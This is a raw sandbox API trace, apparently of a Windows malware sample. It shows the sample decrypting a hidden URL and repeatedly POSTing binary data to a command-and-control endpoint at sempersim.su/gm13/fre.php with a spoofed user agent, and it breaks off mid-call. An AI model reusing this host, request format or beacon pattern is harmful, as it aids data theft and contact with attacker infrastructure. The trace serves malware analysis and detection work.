[0123.289] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0123.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.290] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0123.290] GetProcessHeap () returned 0x620000 [0123.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0123.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.291] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0123.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.295] CryptDestroyKey (hKey=0x62d190) returned 1 [0123.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.297] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0123.297] GetProcessHeap () returned 0x620000 [0123.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0123.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.298] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0123.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.299] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0123.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.300] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0123.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.300] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0123.300] GetProcessHeap () returned 0x620000 [0123.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0123.300] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0123.301] GetProcessHeap () returned 0x620000 [0123.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0123.301] GetProcessHeap () returned 0x620000 [0123.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0123.301] GetProcessHeap () returned 0x620000 [0123.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0123.302] GetProcessHeap () returned 0x620000 [0123.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0123.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.303] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0123.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.309] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0123.315] GetProcessHeap () returned 0x620000 [0123.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0123.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.316] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0123.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.316] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0123.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.317] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0123.317] GetProcessHeap () returned 0x620000 [0123.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0123.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.318] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0123.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.319] CryptDestroyKey (hKey=0x62d710) returned 1 [0123.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.320] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0123.321] GetProcessHeap () returned 0x620000 [0123.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0123.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.323] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0123.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.324] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0123.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0123.325] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0123.325] GetProcessHeap () returned 0x620000 [0123.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0123.325] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bfd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0123.327] GetProcessHeap () returned 0x620000 [0123.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4d0 [0123.327] socket (af=2, type=1, protocol=6) returned 0x2bc [0123.327] connect (s=0x2bc, name=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0123.378] FreeAddrInfoW (pAddrInfo=0x63bfd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0123.378] GetProcessHeap () returned 0x620000 [0123.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0123.378] GetProcessHeap () returned 0x620000 [0123.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0123.379] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0123.379] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0123.380] GetProcessHeap () returned 0x620000 [0123.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x628a78 [0123.380] GetProcessHeap () returned 0x620000 [0123.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0123.380] GetProcessHeap () returned 0x620000 [0123.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642dc8 [0123.380] GetProcessHeap () returned 0x620000 [0123.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0123.381] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0123.381] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0123.381] GetProcessHeap () returned 0x620000 [0123.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x628b30 [0123.381] GetProcessHeap () returned 0x620000 [0123.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0123.382] send (s=0x2bc, buf=0x628b30*, len=237, flags=0) returned 237 [0123.383] send (s=0x2bc, buf=0x6421e0*, len=159, flags=0) returned 159 [0123.383] GetProcessHeap () returned 0x620000 [0123.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0123.383] recv (in: s=0x2bc, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0124.600] GetProcessHeap () returned 0x620000 [0124.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628b30 | out: hHeap=0x620000) returned 1 [0124.600] GetProcessHeap () returned 0x620000 [0124.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0124.601] GetProcessHeap () returned 0x620000 [0124.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628a78 | out: hHeap=0x620000) returned 1 [0124.601] GetProcessHeap () returned 0x620000 [0124.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0124.601] closesocket (s=0x2bc) returned 0 [0124.602] GetProcessHeap () returned 0x620000 [0124.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4d0 | out: hHeap=0x620000) returned 1 [0124.602] GetProcessHeap () returned 0x620000 [0124.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0124.602] GetProcessHeap () returned 0x620000 [0124.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0124.602] GetProcessHeap () returned 0x620000 [0124.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0124.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x580) returned 0x2bc [0124.604] Sleep (dwMilliseconds=0xea60) [0124.620] GetProcessHeap () returned 0x620000 [0124.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0124.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0124.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0124.632] GetProcessHeap () returned 0x620000 [0124.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0124.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.633] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0124.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.634] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0124.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.635] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0124.635] GetProcessHeap () returned 0x620000 [0124.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0124.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.643] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0124.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.644] CryptDestroyKey (hKey=0x62d710) returned 1 [0124.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.645] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0124.645] GetProcessHeap () returned 0x620000 [0124.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0124.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.646] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0124.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.647] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0124.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.648] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0124.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.648] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0124.648] GetProcessHeap () returned 0x620000 [0124.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0124.648] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0124.649] GetProcessHeap () returned 0x620000 [0124.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0124.649] GetProcessHeap () returned 0x620000 [0124.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0124.649] GetProcessHeap () returned 0x620000 [0124.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0124.673] GetProcessHeap () returned 0x620000 [0124.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0124.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0124.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.681] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0124.694] GetProcessHeap () returned 0x620000 [0124.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0124.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.695] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0124.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.696] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0124.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.697] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0124.697] GetProcessHeap () returned 0x620000 [0124.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0124.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.698] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0124.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.706] CryptDestroyKey (hKey=0x62d710) returned 1 [0124.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0124.707] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0124.707] GetProcessHeap () returned 0x620000 [0124.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0124.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.708] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0124.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.709] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0124.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0124.710] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0124.710] GetProcessHeap () returned 0x620000 [0124.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0124.710] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c640*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0124.712] GetProcessHeap () returned 0x620000 [0124.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5c0 [0124.712] socket (af=2, type=1, protocol=6) returned 0x204 [0124.712] connect (s=0x204, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0124.928] FreeAddrInfoW (pAddrInfo=0x63c640*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0124.928] GetProcessHeap () returned 0x620000 [0124.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0124.928] GetProcessHeap () returned 0x620000 [0124.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0124.929] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0124.930] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0124.930] GetProcessHeap () returned 0x620000 [0124.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0124.930] GetProcessHeap () returned 0x620000 [0124.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0124.931] GetProcessHeap () returned 0x620000 [0124.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0124.931] GetProcessHeap () returned 0x620000 [0124.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0124.931] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0124.932] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0124.932] GetProcessHeap () returned 0x620000 [0124.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0124.932] GetProcessHeap () returned 0x620000 [0124.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0124.933] send (s=0x204, buf=0x63a880*, len=237, flags=0) returned 237 [0124.933] send (s=0x204, buf=0x6421e0*, len=159, flags=0) returned 159 [0124.934] GetProcessHeap () returned 0x620000 [0124.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0124.934] recv (in: s=0x204, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0126.566] GetProcessHeap () returned 0x620000 [0126.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0126.567] GetProcessHeap () returned 0x620000 [0126.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0126.567] GetProcessHeap () returned 0x620000 [0126.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0126.568] GetProcessHeap () returned 0x620000 [0126.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0126.568] closesocket (s=0x204) returned 0 [0126.570] GetProcessHeap () returned 0x620000 [0126.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5c0 | out: hHeap=0x620000) returned 1 [0126.570] GetProcessHeap () returned 0x620000 [0126.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0126.570] GetProcessHeap () returned 0x620000 [0126.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0126.571] GetProcessHeap () returned 0x620000 [0126.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0126.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1128) returned 0x204 [0126.574] Sleep (dwMilliseconds=0xea60) [0126.589] GetProcessHeap () returned 0x620000 [0126.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643098 [0126.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0126.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.600] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0126.615] GetProcessHeap () returned 0x620000 [0126.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0126.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.617] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0126.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.618] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0126.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.619] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0126.619] GetProcessHeap () returned 0x620000 [0126.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0126.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.630] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643098, pdwDataLen=0x19fcfc | out: pbData=0x643098, pdwDataLen=0x19fcfc) returned 1 [0126.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.631] CryptDestroyKey (hKey=0x62d710) returned 1 [0126.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0126.632] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0126.632] GetProcessHeap () returned 0x620000 [0126.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0126.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.634] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0126.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0126.638] StrStrA 